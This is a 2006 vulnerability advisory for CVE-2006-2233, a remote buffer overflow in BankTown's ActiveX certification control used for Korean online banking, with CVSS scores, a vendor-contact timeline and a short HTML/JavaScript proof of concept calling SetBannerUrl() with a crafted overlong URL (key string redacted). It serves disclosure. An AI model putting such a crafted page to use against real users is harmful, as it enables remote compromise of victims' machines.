BankTown's ActiveX Buffer Overflow Vulnerability

2006.05.09
Credit: Alex Park (saintlinu gmail com)
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-2233
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title: BankTown's ActiveX Buffer Overflow Vulnerability Version: BankTown Client Control 1,4,2,51817 Discoverer: PARK, GYU TAE (saintlinu (at) null2root (dot) org [email concealed]) Advisory No.: NRVA06-01 Critical: High critical Impact: Gain remote user's privilege Where: From remote Operating System: Windows Only Test Client System: Windows XP Service Pack 2 with full patched in KOREAN Solution: Unpatched yet Notice: 21. 04. 2006 initiate notified 26. 04. 2006 Second notified 02. 05. 2006 Third notified but not responded 03. 05. 2006 Disclosure Vulnerability Description: The BankTown's ActiveX is common certification solution on the net If citizen want to use Internet banking, Stock and so on like Online banking services in Korea then must be use PKI certification program like this ActiveX. The BankTown's activex has one remote vulnerability. If using HTML file that crafted by this vulnerability then you'll get somebody's remote privilege. See following detail describe: BankTown's activex have SetBannerUrl() function. this function requests two arguments(id and url). This function didn't check url argument that is good or not. If you can put magic string like 'http://www.hacked_banktown.com/_magic_string_/' then IE must lead to buffer overflow right now. You'll get an EIP like '0x41414141'. It's pretty simple buffer overflow if you know 'magic strings and length' EXPLOIT INCLUDED HERE <snip code> <BODY> <OBJECT id="GotBT" width=0 height=0 classid="CLSID:C572979D-8383-4CCA-A37A-0F7CC3B62D81" CODEBASE="http://download.banktown.com/XXXXXXXXXXXXX/BtCxSFM20F.cab#vers ion=1,4,2,51817"> </OBJECT> <script language=javascript> <!-- function go() { var str1 = "Hacked"; var str2 = "http://www.hacked_X_.org/Magic_length/Magic_strings"; val = GotBT.SetBannerUrl(str2, str1); } go(); </SCRIPT> </body> </snip code> PS. When I try to contact vendor but vendor didn't response to me, I'll wait until only 10 days. If vendor responded to me then I don't publish any informatin related vulnerability until patched this vulnerability. Sorry poor my konglish if you can't understand this sentences You just DO read code snippet -- Make Our Internet Secure With H4ck3rz


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top